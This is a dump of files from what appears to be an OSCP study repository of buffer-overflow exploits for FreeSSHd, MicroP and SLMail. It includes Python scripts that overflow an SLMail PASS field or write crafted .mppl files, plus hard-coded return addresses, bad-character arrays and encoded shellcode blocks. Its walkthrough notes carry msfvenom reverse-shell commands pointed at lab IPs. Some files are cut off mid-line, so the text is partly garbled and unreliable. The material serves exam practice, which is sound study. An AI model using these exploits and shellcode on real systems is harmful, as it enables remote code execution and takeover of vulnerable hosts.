48 | s.send((Pre + buffer + eob)) 49 | s.recv(1024) 50 | s.close() 51 | 52 | except: 53 | print("unable to connect remoter server....") 54 | sys.exit() 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | -------------------------------------------------------------------------------- /BufferOverflow/Freesshd/wakjhtough: -------------------------------------------------------------------------------- 1 | /Freesshd 2 | 3 | 4 | IP:192.168.43.156 5 | Port 22 (ssh) 6 | ___________________________________________________ 7 | 1. Fuzzing remote connection and find crash point 20400 8 | 9 | 2. Sending pattern and find offset -l 20400 and find value of EIP (326A4231) TOS (6A42346A) 10 | 11 | 3. finding offset value 1055 | 1063 12 | 13 | 14 | 4. Finding bad char {\x00} 15 | 16 | 17 | 5. finding JMP ESP !mona find -s "\xff\xe4" -m user32.dll 18 | 19 | 6. Control EIP 20 | 21 | 22 | 7. Shellcode {msfvenom -p windows/shell_reverse_tcp LHOS=192.168.43.223 LPORT=1234 EXITFUNC=thread -f c -b "\x00" 23 | } 24 | 25 | 26 | * launch shellcode and take connection 27 | 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/Bad_char.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | 5 | file =open("bad_char.mppl", "wb") 6 | 7 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | 
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | 16 | buffer ="A" * 1276 + "B" * 4 + badchars 17 | 18 | file.write(buffer) 19 | 20 | file.close() 21 | 22 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/Bad_char2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | 5 | file =open("bad_char2.mppl", "wb") 6 | 7 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | 
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | 16 | buffer ="A" * 1276 + "B" * 4 + badchars 17 | 18 | file.write(buffer) 19 | 20 | file.close() 21 | 22 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/Bad_char3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | 5 | file =open("bad_char3.mppl", "wb") 6 | 7 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | 16 | buffer ="A" * 1276 + "B" * 4 + badchars 17 | 18 | file.write(buffer) 19 | 20 | file.close() 21 | 22 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/Eip_control.mppl: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Mrnmap/OSCP2020/f1cca5e58d298e56564cd87715b0469ab2eb5e73/BufferOverflow/MicroP/Eip_control.mppl -------------------------------------------------------------------------------- /BufferOverflow/MicroP/bad_char.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mrnmap/OSCP2020/f1cca5e58d298e56564cd87715b0469ab2eb5e73/BufferOverflow/MicroP/bad_char.mppl -------------------------------------------------------------------------------- /BufferOverflow/MicroP/bad_char2.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mrnmap/OSCP2020/f1cca5e58d298e56564cd87715b0469ab2eb5e73/BufferOverflow/MicroP/bad_char2.mppl -------------------------------------------------------------------------------- /BufferOverflow/MicroP/bad_char3.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mrnmap/OSCP2020/f1cca5e58d298e56564cd87715b0469ab2eb5e73/BufferOverflow/MicroP/bad_char3.mppl -------------------------------------------------------------------------------- /BufferOverflow/MicroP/eip_control-py.txt: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | 5 | file =open("Eip_control.mppl", "wb") 6 | 7 | 8 | 9 | buffer ="A" * 1276 + "B" * 4 + "C" * 300 10 | 11 | file.write(buffer) 12 | 13 | file.close() 14 | 15 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/eip_control.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | 5 | file =open("Eip_control.mppl", "wb") 6 | 7 | 8 | 9 | buffer ="A" * 1276 + "\x7b\x95\xad\x74" + "C" * 300 10 | 11 | file.write(buffer) 12 | 13 | file.close() 
14 | 15 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | 5 | file =open("offset.mppl", "wb") 6 | 7 | buffer ="A" * 1276 + "B" * 4 + "C" * 300 8 | 9 | file.write(buffer) 10 | 11 | file.close() 12 | 13 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/raw_shellcode: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/messagebox -f c -b "\x00\x0a\x0d" 2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 3 | [-] No arch selected, selecting arch: x86 from the payload 4 | Found 11 compatible encoders 5 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 6 | x86/shikata_ga_nai succeeded with size 299 (iteration=0) 7 | x86/shikata_ga_nai chosen with final size 299 8 | Payload size: 299 bytes 9 | Final size of c file: 1280 bytes 10 | unsigned char buf[] = 11 | "\xba\xba\xda\x14\xfb\xdb\xd2\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" 12 | "\x45\x83\xee\xfc\x31\x56\x0e\x03\xec\xd4\xf6\x0e\xc9\x02\x6d" 13 | "\x29\x9d\xf0\x66\xfb\x8f\x4b\xf1\xcd\xe6\xc8\x75\x5c\xc8\x9b" 14 | "\xfc\x93\xa3\xea\x1c\x27\xf5\x1a\x96\x49\xd9\x91\x9e\x8d\x56" 15 | "\xbe\xab\x1e\x31\xbf\x82\x1e\x20\xdf\xaf\x8d\x86\x04\x3b\x08" 16 | "\xfa\xcf\x6f\xbb\x7a\xd1\x65\x30\x30\xc9\xf2\x1d\xe4\xe8\xef" 17 | "\x41\xd0\xa3\x64\xb1\x93\x35\x95\x8b\x5c\x04\xa9\x10\x0e\xe3" 18 | "\xe9\x9d\x49\x2d\x26\x50\x54\x6a\x52\x9f\x6d\x08\x81\x48\xe4" 19 | "\x11\x42\xd2\x22\xd3\xbe\x85\xa1\xdf\x0b\xc1\xef\xc3\x8a\x3e" 20 | "\x84\xf8\x07\xc1\x72\x89\x5c\xe6\x9e\xeb\x9f\x54\x96\xc2\xcb" 21 | "\x10\x43\x9d\x36\x4a\x05\xd0\xb8\x67\x4b\x05\x5b\x88\x94\x2a" 22 | "\xed\x32\x6e\x6e\x90\x64\x8c\xe3\xea\x89\x74\x56\x1d\x3f\x8b" 23 | 
"\xa9\x22\xc9\x36\x5e\xb5\xa6\xd4\x7e\x04\x5f\x17\x4d\xa8\xfb" 24 | "\x3f\xc4\xc7\x66\xcd\x16\xf3\xe1\x6d\x73\x09\x7b\x6b\x2d\xf2" 25 | "\x2e\x77\x5b\xce\x81\xcc\xf3\x6d\x6c\x8e\x83\x6e\x4b\xbc\x63" 26 | "\xd1\x6c\xbf\x8b\x86\xfd\x47\x2c\x77\x6a\xd6\xab\x12\x28\x70" 27 | "\x79\xb8\xdf\xf3\xb0\x99\xa8\xaf\x96\x17\x20\xac\xbf\x7f\x12" 28 | "\x12\x60\xe8\x1f\x01\x26\xc9\xf7\xd7\xc9\x64\x28\x7f\x79\x5b" 29 | "\x08\x19\xed\xeb\x2d\x89\x81\xda\x64\xd9\x16\x39\x67\x50\x47" 30 | "\x70\x55\x30\xdb\x22\x0b\x4b\x0b\xf5\x6b\xe3\x53\xa3\x63"; 31 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/shellcode.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mrnmap/OSCP2020/f1cca5e58d298e56564cd87715b0469ab2eb5e73/BufferOverflow/MicroP/shellcode.mppl -------------------------------------------------------------------------------- /BufferOverflow/MicroP/shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | #msfvenom -p windows/messagebox -f c -b "\x00\x0a\x0d" 5 | 6 | file =open("shellcode.mppl", "wb") 7 | 8 | shellcode=("\xdd\xc4\xd9\x74\x24\xf4\x58\xbb\x74\x35\x1d\xbb\x31\xc9\xb1" 9 | "\x45\x31\x58\x17\x03\x58\x17\x83\xb4\x31\xff\x4e\xed\xd1\x64" 10 | "\x69\x79\x02\x6f\xbb\x53\xf8\xf8\x8d\x9a\x99\x8d\x9f\x2c\xe9" 11 | "\xe4\x53\xc7\x9b\x14\xe7\x91\x6b\xae\x89\x3d\xe7\x86\x4d\x72" 12 | "\xef\x93\x5e\xd5\x0e\x8d\x5e\x04\x70\xa6\xcd\xe2\x55\x33\x48" 13 | "\xd6\x1e\x17\x7b\x5e\x20\x72\xf0\xd4\x3a\x09\x5d\xc8\x3b\xe6" 14 | "\x81\x3c\x75\x73\x71\xb7\x84\x6d\x4b\x38\xb7\xb1\x50\x6a\x3c" 15 | "\xf1\xdd\x75\xfc\x3d\x10\x78\x39\x2a\xdf\x41\xb9\x89\x08\xc0" 16 | "\xa0\x59\x12\x0e\x22\xb5\xc5\xc5\x28\x02\x81\x83\x2c\x95\x7e" 17 | "\xb8\x49\x1e\x81\x56\xd8\x64\xa6\xba\xba\xa7\x14\xca\x15\xfc" 18 | 
"\xd0\x2f\xec\x3e\x8a\x21\xa1\xb0\xa7\x6f\xd6\x52\xc8\x70\xd9" 19 | "\xe4\x72\x8a\x9d\x89\xa4\x70\x92\xf2\x49\x50\x07\x15\xff\x67" 20 | "\x58\x1a\x89\xd2\xaf\x8d\xe6\xb0\x8f\x0c\x9f\x7b\xe2\xa0\x3b" 21 | "\x13\x77\xce\xa6\x91\x47\xeb\xa1\x09\x8c\x01\x3b\x57\x9a\xea" 22 | "\x6e\x93\xaa\xd7\xc1\x20\x04\x75\xac\xea\xd2\x66\x0b\x40\x35" 23 | "\xc9\xac\x9b\x3a\x9e\x3d\x1b\x9d\x7f\xaa\xba\x7a\xe5\x68\x54" 24 | "\xc8\x80\x1f\xd7\xe3\x91\x68\x4b\x20\x2c\xe0\x90\x40\x68\xd2" 25 | "\x76\xb1\xe0\x5f\x25\xf7\xd1\x37\xbb\x98\x7c\xe8\x53\x08\x53" 26 | "\xc8\xc5\xbe\xe3\x6d\x65\x53\xc5\xa4\xfd\xe7\x01\x27\x74\x16" 27 | "\x78\x95\xd4\x8a\x2a\x4b\x27\xfc\xfc\xab\x87\x02\xab\x23") 28 | 29 | 30 | buffer = "\x90" * 24 31 | buffer += shellcode 32 | buffer += "\x90" * (1276 -len(buffer)) 33 | buffer += "\x7b\x95\xad\x74" 34 | 35 | file.write(buffer) 36 | 37 | file.close() 38 | 39 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/shellcode2.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mrnmap/OSCP2020/f1cca5e58d298e56564cd87715b0469ab2eb5e73/BufferOverflow/MicroP/shellcode2.mppl -------------------------------------------------------------------------------- /BufferOverflow/MicroP/shellcode2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #micro Op crashing mppl file crashing script 4 | #msfvenom -p windows/messagebox -f c -b "\x00\x0a\x0d" 5 | 6 | file =open("shellcode2.mppl", "wb") 7 | 8 | shellcode=("\xdd\xc4\xbe\xc4\x84\x66\xbc\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 9 | "\x52\x83\xea\xfc\x31\x72\x13\x03\xb6\x97\x84\x49\xca\x70\xca" 10 | "\xb2\x32\x81\xab\x3b\xd7\xb0\xeb\x58\x9c\xe3\xdb\x2b\xf0\x0f" 11 | "\x97\x7e\xe0\x84\xd5\x56\x07\x2c\x53\x81\x26\xad\xc8\xf1\x29" 12 | "\x2d\x13\x26\x89\x0c\xdc\x3b\xc8\x49\x01\xb1\x98\x02\x4d\x64" 13 | 
"\x0c\x26\x1b\xb5\xa7\x74\x8d\xbd\x54\xcc\xac\xec\xcb\x46\xf7" 14 | "\x2e\xea\x8b\x83\x66\xf4\xc8\xae\x31\x8f\x3b\x44\xc0\x59\x72" 15 | "\xa5\x6f\xa4\xba\x54\x71\xe1\x7d\x87\x04\x1b\x7e\x3a\x1f\xd8" 16 | "\xfc\xe0\xaa\xfa\xa7\x63\x0c\x26\x59\xa7\xcb\xad\x55\x0c\x9f" 17 | "\xe9\x79\x93\x4c\x82\x86\x18\x73\x44\x0f\x5a\x50\x40\x4b\x38" 18 | "\xf9\xd1\x31\xef\x06\x01\x9a\x50\xa3\x4a\x37\x84\xde\x11\x50" 19 | "\x69\xd3\xa9\xa0\xe5\x64\xda\x92\xaa\xde\x74\x9f\x23\xf9\x83" 20 | "\xe0\x19\xbd\x1b\x1f\xa2\xbe\x32\xe4\xf6\xee\x2c\xcd\x76\x65" 21 | "\xac\xf2\xa2\x2a\xfc\x5c\x1d\x8b\xac\x1c\xcd\x63\xa6\x92\x32" 22 | "\x93\xc9\x78\x5b\x3e\x30\xeb\xa4\x17\x3a\x6c\x4c\x6a\x3a\x76" 23 | "\x5f\xe3\xdc\x1c\x4f\xa2\x77\x89\xf6\xef\x03\x28\xf6\x25\x6e" 24 | "\x6a\x7c\xca\x8f\x25\x75\xa7\x83\xd2\x75\xf2\xf9\x75\x89\x28" 25 | "\x95\x1a\x18\xb7\x65\x54\x01\x60\x32\x31\xf7\x79\xd6\xaf\xae" 26 | "\xd3\xc4\x2d\x36\x1b\x4c\xea\x8b\xa2\x4d\x7f\xb7\x80\x5d\xb9" 27 | "\x38\x8d\x09\x15\x6f\x5b\xe7\xd3\xd9\x2d\x51\x8a\xb6\xe7\x35" 28 | "\x4b\xf5\x37\x43\x54\xd0\xc1\xab\xe5\x8d\x97\xd4\xca\x59\x10" 29 | "\xad\x36\xfa\xdf\x64\xf3\x1a\x02\xac\x0e\xb3\x9b\x25\xb3\xde" 30 | "\x1b\x90\xf0\xe6\x9f\x10\x89\x1c\xbf\x51\x8c\x59\x07\x8a\xfc" 31 | "\xf2\xe2\xac\x53\xf2\x26") 32 | 33 | 34 | buffer = "\x90" * 24 35 | buffer += shellcode 36 | buffer += "\x90" * (1276 -len(buffer)) 37 | buffer += "\x7b\x95\xad\x74" 38 | 39 | file.write(buffer) 40 | 41 | file.close() 42 | 43 | -------------------------------------------------------------------------------- /BufferOverflow/MicroP/walkthough_microp: -------------------------------------------------------------------------------- 1 | Micro_op app use .mppl file 2 | APp MicroOp 3 | ip 192.168.0.134 4 | Port - NA 5 | ______________All file send in win directly for explit____________________ 6 | 7 | 1. crashsing buffer (.mpll file ) A*4000 8 | 2. Finding EIP and offset =>71423571 (/pattern_offset.rb -l 4000 -q 71423571 9 | [*] Exact match at offset 1276) 10 | 11 | 3. 
check for EIP controlled at 1276, send payload with "A" * 1276 +"B" * 4 +"C" 8300 12 | 13 | 4. check all data come in buffer 14 | 15 | 5. finding bad character run bad_char.mppl and check EAX register (0048dd1c+514) 16 | bad char=\x00\x0a\x0d\ 17 | 18 | 6. now we refer to EAX so let's find JMP EAX {00000000 FFE0 JMP EAX} 19 | 20 | 7. !mona modules | !mona find -s "\xff\xe0" -m user32.dll 21 | 22 | Log data, item 24 23 | Address=7595509B 24 | Message= 0x7595509b (b+0x003f509b) : "\xff\xe0" | {PAGE_READONLY} [shell32.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7601.17514 (C:\Windows\syswow64\shell32.dll) 25 | 26 | 8. EIP control JMP EAX (74AD957B) => "\x7b\x95\xad\x74" 27 | 28 | 9. Shellcode 29 | 30 | msfvenom -p windows/messagebox -f -c -b "\x00\x0a\x0d" 31 | 10. reverse shell 32 | msfvenom -p windows/shell_reverse_tcp LHOS=1192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00\x0a\x0d -------------------------------------------------------------------------------- /BufferOverflow/SLMail/Bad_char.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | badchar=("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f" 6 | "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | 
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 12 | ) 13 | 14 | buffer="A"*2606+"BBBB"+badchar 15 | print ("Size %s"%(len(buffer))) 16 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | connect=s.connect(('192.168.0.134',110)) 18 | s.recv(1024) 19 | s.send('USER test\r\n') 20 | s.recv(1024) 21 | s.send('PASS ' + buffer + '\r\n') 22 | s.send('QUIT\r\n') -------------------------------------------------------------------------------- /BufferOverflow/SLMail/EIP_control.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import struct 4 | 5 | jmp_esp= struct.pack(" 39694438 10 | 11 | 3. Find Offset 2606 12 | 13 | 4. EIP control 14 | buffer="A"*2606+"BBBB" +"DDDD" 15 | 16 | 5. Find JMP ESP => !mona modules (no bad char to ensure) 17 | !mona find -s "\xff\xe4" -m slmfc.dll 18 | 5F4A358F 19 | 20 | 6. FInd Bad Char "\x00\x0a\x0d" 21 | 22 | JMP ESP 5F4A358F 23 | 24 | 7. 
FInal Shell code msfvenom -p windows/shell_reverse_tcp LHOS=192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00\x0a\x0d" 25 | 26 | 27 | -------------------------------------------------------------------------------- /BufferOverflow/SLMail/Shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import struct 4 | 5 | 6 | Shellcode=("\xb8\x3e\x17\x16\xe8\xdb\xd0\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" 7 | "\x52\x83\xc2\x04\x31\x42\x0e\x03\x7c\x19\xf4\x1d\x7c\xcd\x7a" 8 | "\xdd\x7c\x0e\x1b\x57\x99\x3f\x1b\x03\xea\x10\xab\x47\xbe\x9c" 9 | "\x40\x05\x2a\x16\x24\x82\x5d\x9f\x83\xf4\x50\x20\xbf\xc5\xf3" 10 | "\xa2\xc2\x19\xd3\x9b\x0c\x6c\x12\xdb\x71\x9d\x46\xb4\xfe\x30" 11 | "\x76\xb1\x4b\x89\xfd\x89\x5a\x89\xe2\x5a\x5c\xb8\xb5\xd1\x07" 12 | "\x1a\x34\x35\x3c\x13\x2e\x5a\x79\xed\xc5\xa8\xf5\xec\x0f\xe1" 13 | "\xf6\x43\x6e\xcd\x04\x9d\xb7\xea\xf6\xe8\xc1\x08\x8a\xea\x16" 14 | "\x72\x50\x7e\x8c\xd4\x13\xd8\x68\xe4\xf0\xbf\xfb\xea\xbd\xb4" 15 | "\xa3\xee\x40\x18\xd8\x0b\xc8\x9f\x0e\x9a\x8a\xbb\x8a\xc6\x49" 16 | "\xa5\x8b\xa2\x3c\xda\xcb\x0c\xe0\x7e\x80\xa1\xf5\xf2\xcb\xad" 17 | "\x3a\x3f\xf3\x2d\x55\x48\x80\x1f\xfa\xe2\x0e\x2c\x73\x2d\xc9" 18 | "\x53\xae\x89\x45\xaa\x51\xea\x4c\x69\x05\xba\xe6\x58\x26\x51" 19 | "\xf6\x65\xf3\xf6\xa6\xc9\xac\xb6\x16\xaa\x1c\x5f\x7c\x25\x42" 20 | "\x7f\x7f\xef\xeb\xea\x7a\x78\xd4\x43\x84\xff\xbc\x91\x84\xfb" 21 | "\xee\x1f\x62\x69\x1f\x76\x3d\x06\x86\xd3\xb5\xb7\x47\xce\xb0" 22 | "\xf8\xcc\xfd\x45\xb6\x24\x8b\x55\x2f\xc5\xc6\x07\xe6\xda\xfc" 23 | "\x2f\x64\x48\x9b\xaf\xe3\x71\x34\xf8\xa4\x44\x4d\x6c\x59\xfe" 24 | "\xe7\x92\xa0\x66\xcf\x16\x7f\x5b\xce\x97\xf2\xe7\xf4\x87\xca" 25 | "\xe8\xb0\xf3\x82\xbe\x6e\xad\x64\x69\xc1\x07\x3f\xc6\x8b\xcf" 26 | "\xc6\x24\x0c\x89\xc6\x60\xfa\x75\x76\xdd\xbb\x8a\xb7\x89\x4b" 27 | "\xf3\xa5\x29\xb3\x2e\x6e\x49\x56\xfa\x9b\xe2\xcf\x6f\x26\x6f" 28 | "\xf0\x5a\x65\x96\x73\x6e\x16\x6d\x6b\x1b\x13\x29\x2b\xf0\x69" 29 | 
"\x22\xde\xf6\xde\x43\xcb") 30 | jmp_esp= struct.pack("625011AF" 5 | 6 | exploit=("\xdb\xd1\xbb\xb1\x96\x2f\x26\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 7 | "\x52\x83\xc2\x04\x31\x5a\x13\x03\xeb\x85\xcd\xd3\xf7\x42\x93" 8 | "\x1c\x07\x93\xf4\x95\xe2\xa2\x34\xc1\x67\x94\x84\x81\x25\x19" 9 | "\x6e\xc7\xdd\xaa\x02\xc0\xd2\x1b\xa8\x36\xdd\x9c\x81\x0b\x7c" 10 | "\x1f\xd8\x5f\x5e\x1e\x13\x92\x9f\x67\x4e\x5f\xcd\x30\x04\xf2" 11 | "\xe1\x35\x50\xcf\x8a\x06\x74\x57\x6f\xde\x77\x76\x3e\x54\x2e" 12 | "\x58\xc1\xb9\x5a\xd1\xd9\xde\x67\xab\x52\x14\x13\x2a\xb2\x64" 13 | "\xdc\x81\xfb\x48\x2f\xdb\x3c\x6e\xd0\xae\x34\x8c\x6d\xa9\x83" 14 | "\xee\xa9\x3c\x17\x48\x39\xe6\xf3\x68\xee\x71\x70\x66\x5b\xf5" 15 | "\xde\x6b\x5a\xda\x55\x97\xd7\xdd\xb9\x11\xa3\xf9\x1d\x79\x77" 16 | "\x63\x04\x27\xd6\x9c\x56\x88\x87\x38\x1d\x25\xd3\x30\x7c\x22" 17 | "\x10\x79\x7e\xb2\x3e\x0a\x0d\x80\xe1\xa0\x99\xa8\x6a\x6f\x5e" 18 | "\xce\x40\xd7\xf0\x31\x6b\x28\xd9\xf5\x3f\x78\x71\xdf\x3f\x13" 19 | "\x81\xe0\x95\xb4\xd1\x4e\x46\x75\x81\x2e\x36\x1d\xcb\xa0\x69" 20 | "\x3d\xf4\x6a\x02\xd4\x0f\xfd\xed\x81\x0e\x6e\x85\xd3\x10\x94" 21 | "\x84\x5d\xf6\xfe\x38\x08\xa1\x96\xa1\x11\x39\x06\x2d\x8c\x44" 22 | "\x08\xa5\x23\xb9\xc7\x4e\x49\xa9\xb0\xbe\x04\x93\x17\xc0\xb2" 23 | "\xbb\xf4\x53\x59\x3b\x72\x48\xf6\x6c\xd3\xbe\x0f\xf8\xc9\x99" 24 | 